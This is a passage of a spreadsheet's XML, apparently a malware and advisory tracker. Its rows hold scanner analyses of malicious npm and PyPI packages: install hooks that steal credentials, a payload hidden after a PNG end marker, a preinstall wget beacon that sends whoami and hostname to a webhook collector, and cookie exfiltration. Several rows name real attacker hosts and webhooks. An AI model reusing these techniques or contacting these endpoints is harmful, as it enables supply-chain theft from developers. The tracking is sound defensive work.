      <c r="Q383" s="5" t="inlineStr"/>
      <c r="R383" s="5" t="inlineStr"/>
      <c r="S383" s="5" t="inlineStr">
        <is>
          <t>k8saudit shipped rules do not detect privileged/sensitive settings on init or ephemeral containers in github.com/falcosecurity/plugins/plugins/k8saudit</t>
        </is>
      </c>
      <c r="T383" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GO-2026-6538</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>GHSA-jxw5-69p3-hpm4</t>
        </is>
      </c>
      <c r="D384" s="5" t="inlineStr"/>
      <c r="E384" s="5" t="inlineStr"/>
      <c r="F384" s="5" t="inlineStr"/>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="inlineStr"/>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K384" s="5" t="inlineStr"/>
      <c r="L384" s="5" t="inlineStr">
        <is>
          <t>npm:native-runner</t>
        </is>
      </c>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q384" s="5" t="inlineStr"/>
      <c r="R384" s="5" t="inlineStr"/>
      <c r="S384" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c057973da17ec629b4cd8c10a2b74108761f4a9ad4a1a31b280031da1f7139ca)
On `require('native-runner')`, a top-level IIFE in index.js polls for up to two minutes for a file at %APPDATA%\Microsoft\Windows\node_runtime_helper.exe and, once present, spawns it via child_process.spawn with {detached:true, windowsHide:true, stdio:'ignore'} and unref's the child, so the process outlives the importing Node process with no visible window and no captured output. This launcher is not part of the package's advertised API (README describes only `runBinary`/`runDetached`) and fires purely as a side effect of import. The staging directory %APPDATA%\Microsoft\Windows is chosen to resemble a legitimate Windows system location. The manifest declares a single dependency, `img-to-native@^1.0.0`, which is never require()'d by the shipped source; its only role in the install graph is to place the binary that this package then launches. Together the two packages form a drop-and-execute chain: installing and importing native-runner pulls in img-to-native, which stages node_runtime_helper.exe at the hardcoded path, and native-runner's import-time IIFE then executes that opaque binary hidden and detached on the installer's machine.
## Source: ghsa-malware (4eb077250ca4da76df88e49a2c314e67cb58761ae1cbffa1aa7742878d042a44)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84" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17218</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>GHSA-mh9w-qr45-6wrq</t>
        </is>
      </c>
      <c r="D385" s="5" t="inlineStr"/>
      <c r="E385" s="5" t="inlineStr"/>
      <c r="F385" s="5" t="inlineStr"/>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="inlineStr"/>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr">
        <is>
          <t>npm, vite, gin</t>
        </is>
      </c>
      <c r="K385" s="5" t="inlineStr"/>
      <c r="L385" s="5" t="inlineStr">
        <is>
          <t>npm:vite-plugin-crypto</t>
        </is>
      </c>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q385" s="5" t="inlineStr"/>
      <c r="R385" s="5" t="inlineStr"/>
      <c r="S385" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (54ee82c069dcdf259199f5844c6ff46be3020d79609ff7b7b8ebc82017c59b2c)
vite-plugin-crypto@1.0.2 exposes a Vite plugin factory whose body concatenates three option fields — `secret`, `salt`, and `iv` — into a single string and passes it to `System.import(...)` from the `systemjs` runtime module loader, discarding the returned promise with `.then(() =&gt; {})`. Only `secret` is used by the advertised AES-GCM `encrypt()` path; `salt` and `iv` are declared on the options type but are absent from the documented options table and are unused by the real crypto code (which generates its own random salt/IV per call). The concatenated string is treated as a module specifier by SystemJS, which resolves URLs and executes fetched JavaScript, so whoever controls these option values obtains arbitrary JavaScript execution on the Vite build/dev host each time the config is loaded. Pulling in a browser-oriented dynamic module loader as the package's only runtime dependency, naming the concatenated input `derivedSecret`, and swallowing the promise frame the remote-loader call as a benign key-derivation step. Base64 decoding in dist/index.cjs and dist/index.js is used within the AES-GCM helper. The trigger fires at plugin construction during `vite build` / `vite dev`.
## Source: ghsa-malware (fdaf333e613f70df12ceaf378093d996a4bc1dd4df1a6350c4848a5de0fb83e7)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85" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17222</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>GHSA-pm4h-xrhq-vh62</t>
        </is>
      </c>
      <c r="D386" s="5" t="inlineStr"/>
      <c r="E386" s="5" t="inlineStr"/>
      <c r="F386" s="5" t="inlineStr"/>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="inlineStr"/>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K386" s="5" t="inlineStr"/>
      <c r="L386" s="5" t="inlineStr">
        <is>
          <t>npm:kalasnik-npm-simple-test</t>
        </is>
      </c>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q386" s="5" t="inlineStr"/>
      <c r="R386" s="5" t="inlineStr"/>
      <c r="S386" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f1463688412306d5d6f791bb036bea59aeb7251a3044a52c57119768f27cd463)
The package's postinstall script send_data.js runs automatically on npm install. It reads C:\temp\test.txt from the installer's filesystem and POSTs the contents over plain HTTP to a hardcoded remote endpoint at 35.178.197.251:8080. Package metadata ("Simplified test", author "Purple", UNLICENSED) is consistent with a PoC exfiltration harness rather than a legitimate library.
## Source: ghsa-malware (892887d57c2d036af7c30a0a27995006f042229dd0959c7653a5560054277cbe)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86" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17206</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>GHSA-pqvc-prrc-mv45</t>
        </is>
      </c>
      <c r="D387" s="5" t="inlineStr"/>
      <c r="E387" s="5" t="inlineStr"/>
      <c r="F387" s="5" t="inlineStr"/>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="inlineStr"/>
      <c r="I387" s="5" t="inlineStr"/>
      <c r="J387" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K387" s="5" t="inlineStr"/>
      <c r="L387" s="5" t="inlineStr">
        <is>
          <t>npm:uuid-date</t>
        </is>
      </c>
      <c r="M387" s="5" t="inlineStr"/>
      <c r="N387" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O387" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P387" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q387" s="5" t="inlineStr"/>
      <c r="R387" s="5" t="inlineStr"/>
      <c r="S387" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (1794c1dba5ffb902f0c8011a60990baff7cf5ebc1f90ab634937734944696995)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87" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17210</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>GHSA-pv7p-ghgv-268x</t>
        </is>
      </c>
      <c r="D388" s="5" t="inlineStr"/>
      <c r="E388" s="5" t="inlineStr"/>
      <c r="F388" s="5" t="inlineStr"/>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="inlineStr"/>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr">
        <is>
          <t>npm:img-to-native</t>
        </is>
      </c>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q388" s="5" t="inlineStr"/>
      <c r="R388" s="5" t="inlineStr"/>
      <c r="S388" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7676788d88c2194b8d5c048decfbe06550798ce342af54f8975bc26422d10c53)
On require() of img-to-native, index.js reads banner.jpg from the.cache directory of its sole dependency cdn-img-fetch, locates a payload appended after the PNG IEND marker, base64-decodes it, and AES-256-CBC decrypts it using a key derived from sha256('nif-runtime-2027'). The decrypted bytes are written to %LOCALAPPDATA%\Programs\NodeRuntime\node_runtime_helper.exe with mode 0o755, and the source image is then unlinked. An fs.watch fallback waits for the image to appear if it is not yet staged. The payload is obfuscated (hidden after a PNG end-of-image marker, base64-encoded, AES-encrypted), unverified (no hash or signature check), and dropped to a persistence-adjacent path with executable bits set. The advertised purpose ("convert image files to native binary representation") does not require decrypting content appended after a PNG IEND chunk to materialize a Windows executable. The companion package cdn-img-fetch is pinned as a caret range (^1.0.0), so future 1.x releases can silently change the delivered payload bytes. Installing or loading this package results in attacker-controlled code being written to the installer's filesystem with execute permission.
## Source: ghsa-malware (7131e9cb1bdeb272ae7e26f2877087fd5da8716ef7c08e0fc0bf1359e278df8e)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88" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17216</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>GHSA-w4g6-rgx4-2wjf</t>
        </is>
      </c>
      <c r="D389" s="5" t="inlineStr"/>
      <c r="E389" s="5" t="inlineStr"/>
      <c r="F389" s="5" t="inlineStr"/>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="inlineStr"/>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K389" s="5" t="inlineStr"/>
      <c r="L389" s="5" t="inlineStr">
        <is>
          <t>npm:my-skibidi</t>
        </is>
      </c>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q389" s="5" t="inlineStr"/>
      <c r="R389" s="5" t="inlineStr"/>
      <c r="S389" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (02c4b3433d9f819c70b6ec69fe7bcc0ae0a7ff48540e11394ea5fb8f3c49049c)
my-skibidi@1.0.2 contains top-level code in its main module that unconditionally POSTs `document.cookie` to the hardcoded remote endpoint https://c-b34596407b6d47d6.dgactf-challs.site/addPost via a `sendPost(...)` call. Any downstream web application that bundles this package will, when loaded in a user's browser, transmit that user's cookies and session data to the external host. The destination is not a first-party service and is not caller-configurable; the exfiltration runs as a side effect of loading the module. The package's declared functionality does not require reading or transmitting cookies, and no consent gate or configuration controls the behavior.
## Source: ghsa-malware (47126398a61b320eb7bbad1b71461843e4609e46f5137d735ea3d15d976c7f46)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89" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17217</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17213</t>
        </is>
      </c>
      <c r="D390" s="5" t="inlineStr"/>
      <c r="E390" s="5" t="inlineStr"/>
      <c r="F390" s="5" t="inlineStr"/>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="inlineStr"/>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K390" s="5" t="inlineStr"/>
      <c r="L390" s="5" t="inlineStr">
        <is>
          <t>PyPI:azure-langchain-example</t>
        </is>
      </c>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q390" s="5" t="inlineStr"/>
      <c r="R390" s="5" t="inlineStr"/>
      <c r="S390" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1cffc3a51858b1b7a17ff0edfd2eeae6383e83b4eff5bc078f7b1d4f5ba36ad2)
On `import azure_langchain_example`, the package's __init__.py starts a background daemon thread that issues a GET request to https://litellm.adversarylabx.com/.telemetry with the installer's hostname, resolved IP address, a timestamp, and the package name in the query string, using urllib.request.urlopen with a short timeout and silenced exceptions. The destination host is unrelated to the package's advertised purpose (a minimal LangChain wrapper for Azure OpenAI) and to any Azure or LangChain publisher domain. The behavior fires unconditionally at import without user consent or opt-out and is not mentioned in the README. Package metadata is placeholder (`Your Name &lt;you@example.com&gt;`) and the name resembles the Azure+LangChain ecosystem, consistent with a lookalike used to profile installers who mistype or guess an Azure/LangChain integration package name. An in-source comment labeling the request a harmless canary is author-controlled text that does not change the observed behavior.
## Source: kam193 (59c10650dde5db077b435212025a4cb48ab69daf76022cb932dfec98beea4479)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390" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17213</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17214</t>
        </is>
      </c>
      <c r="D391" s="5" t="inlineStr"/>
      <c r="E391" s="5" t="inlineStr"/>
      <c r="F391" s="5" t="inlineStr"/>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="inlineStr"/>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K391" s="5" t="inlineStr"/>
      <c r="L391" s="5" t="inlineStr">
        <is>
          <t>npm:git-en-boite-logging</t>
        </is>
      </c>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q391" s="5" t="inlineStr"/>
      <c r="R391" s="5" t="inlineStr"/>
      <c r="S391" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f6ebee9f4428d7f14f6f941438064715c8bece34c5fe6bfedf32bbd8cba226c0)
package.json declares a preinstall lifecycle hook that runs `wget` to a hardcoded webhook.site collector URL (https://webhook.site/3fcfa5af-1b4e-4556-9d48-26190d02795f/), passing `$(whoami)`, `$(hostname)`, and `$(pwd)` as query parameters. On `npm install`, npm invokes the preinstall script automatically, so the installer's OS username, host name, and current working directory are transmitted to an anonymous third-party webhook collector without any user action. This is the canonical dependency-confusion / reconnaissance beacon shape: an otherwise-empty package whose only on-install effect is to phone home installer identity to an attacker-chosen endpoint, typically used to confirm ingress into a target's internal build environment before staging a follow-on payload.
</t>
        </is>
      </c>
      <c r="T391" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17214</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17215</t>
        </is>
      </c>
      <c r="D392" s="5" t="inlineStr"/>
      <c r="E392" s="5" t="inlineStr"/>
      <c r="F392" s="5" t="inlineStr"/>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="inlineStr"/>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr">
        <is>
          <t>npm, eslint, go, gin</t>
        </is>
      </c>
      <c r="K392" s="5" t="inlineStr"/>
      <c r="L392" s="5" t="inlineStr">
        <is>
          <t>npm:eslint-plugin-skywagon-web</t>
        </is>
      </c>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q392" s="5" t="inlineStr"/>
      <c r="R392" s="5" t="inlineStr"/>
      <c r="S392" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3c5d134d2e79b24ed65d2998520db05b5cc86b251ae579a6d8cec6d8fe02340f)
eslint-plugin-skywagon-web@100.0.0 ships an index.js that is executed via a preinstall lifecycle script on `npm install`. The script collects installer-side identifiers — os.hostname(), os.userInfo().username, os.homedir(), process.cwd(), dns.getServers(), and the contents of the package's package.json — and POSTs them over HTTPS to the hardcoded external collector eo1blcdjptwydyq.m.pipedream.net. A source comment ("replace burpcollaborator.net with Interactsh or pipedream") shows the file is a dependency-confusion exfiltration template repurposed as a live payload. The implausibly high version number (100.0.0) is consistent with a dependency-confusion lure intended to override an internal package of the same name during resolution.
</t>
        </is>
      </c>
      <c r="T392" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17215</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17223</t>
        </is>
      </c>
      <c r="D393" s="5" t="inlineStr"/>
      <c r="E393" s="5" t="inlineStr"/>
      <c r="F393" s="5" t="inlineStr"/>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="inlineStr"/>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K393" s="5" t="inlineStr"/>
      <c r="L393" s="5" t="inlineStr">
        <is>
          <t>npm:chalk-figlet</t>
        </is>
      </c>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q393" s="5" t="inlineStr"/>
      <c r="R393" s="5" t="inlineStr"/>
      <c r="S393" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (66dfb43d5f4ae643e32497447293c12170a21f258a7e7d3d07e8f90f2119e13b)
package.json declares a postinstall script (`node example.js`) that requires index.js at install time. index.js contains a function named `_syncTelemetry` that decodes a hex-obfuscated URL (`Buffer.from('687474703a...','hex')` -&gt; `http://104.234.65.75:700/setup.exe`) and a hex-obfuscated filename (`RuntimeBroker.exe`), downloads the binary over plain HTTP from a bare IP using `axios.get(..., {responseType:'stream'})` piped to `fs.createWriteStream` in `os.tmpdir()`, and executes it via `child_process.exec` with `windowsHide: true`. Execution is gated on `process.env.npm_lifecycle_event` so it fires during `npm install`. The dropped filename impersonates the legitimate Windows system binary RuntimeBroker.exe, and the package presents itself as a chalk+figlet wrapper unrelated to the observed behavior.
</t>
        </is>
      </c>
      <c r="T393" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17223</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17224</t>
        </is>
      </c>
      <c r="D394" s="5" t="inlineStr"/>
      <c r="E394" s="5" t="inlineStr"/>
      <c r="F394" s="5" t="inlineStr"/>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="inlineStr"/>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K394" s="5" t="inlineStr"/>
      <c r="L394" s="5" t="inlineStr">
        <is>
          <t>npm:fabric-asset-pipeline</t>
        </is>
      </c>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q394" s="5" t="inlineStr"/>
      <c r="R394" s="5" t="inlineStr"/>
      <c r="S394" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (bb92787d766d5bfa0c384cc04909689215fa0d3e869630422caa8bedd303038a)
fabric-asset-pipeline@1.0.0 declares a postinstall hook that runs index.js on npm install. index.js is heavily obfuscated (obfuscator.io-style rotated string array plus base64+RC4 decoding of identifiers and URLs, with newline/regex anti-formatting hooks) and implements a Minecraft credential stealer: functions stealLauncherAccounts(), stealAltLaunchers(), and readSessionDump() read account credential stores from the official Minecraft launcher (launcher_accounts.json / launcher_profiles.json) as well as Prism/MultiMC, TLauncher, Modrinth, PolyMC, and GDLauncher, plus a session dump from the OS temp directory. Extracted account names, access tokens, and refresh tokens are POSTed via https.request to a hardcoded webhook whose URL is RC4-decoded at runtime. A companion sendInfo() call ships os.hostname(), os.userInfo().username, os.platform()/os.release(), and the recovered Minecraft username to the same endpoint. None of this behavior is part of the package's advertised 'asset loader bridge' purpose, and the obfuscation deliberately conceals both the exfiltration functions and the destination URL.
</t>
        </is>
      </c>
      <c r="T394" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17224</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17225</t>
        </is>
      </c>
      <c r="D395" s="5" t="inlineStr"/>
      <c r="E395" s="5" t="inlineStr"/>
      <c r="F395" s="5" t="inlineStr"/>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="inlineStr"/>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr">
        <is>
          <t>npm:fabric-render-bridge</t>
        </is>
      </c>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q395" s="5" t="inlineStr"/>
      <c r="R395" s="5" t="inlineStr"/>
      <c r="S395" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c2715ef0b07fbf0ca24fb8dadec44f2fcfdc273421a49ad2201bf8e40d3e2c01)
package.json declares postinstall="node index.js", so `npm install fabric-render-bridge` automatically executes index.js. index.js reads Minecraft launcher credential stores across multiple launchers (launcher_accounts.json and launcher_profiles.json for the official launcher, PrismLauncher, MultiMC, TLauncher, Modrinth, PolyMC, GDLauncher) plus a session dump from the OS temp directory, extracts accessToken/refreshToken values and account usernames, and POSTs them via https.request to a hardcoded Discord webhook at discord.com/api/webhooks/1554065488726990909/. A separate sendInfo() routine POSTs os.hostname(), os.userInfo().username, os.platform() and os.release() to the same webhook on every install. The package presents itself as a Fabric render bridge but ships no rendering functionality; its sole install-time behavior is credential and host-identity theft.
</t>
        </is>
      </c>
      <c r="T395" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17225</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17226</t>
        </is>
      </c>
      <c r="D396" s="5" t="inlineStr"/>
      <c r="E396" s="5" t="inlineStr"/>
      <c r="F396" s="5" t="inlineStr"/>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="inlineStr"/>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr">
        <is>
          <t>npm:figlet-chalk-render</t>
        </is>
      </c>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q396" s="5" t="inlineStr"/>
      <c r="R396" s="5" t="inlineStr"/>
      <c r="S396" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (992cf49b88be09149971d4ac18fe2a4b61d242186f553cb3283a26970b886d7f)
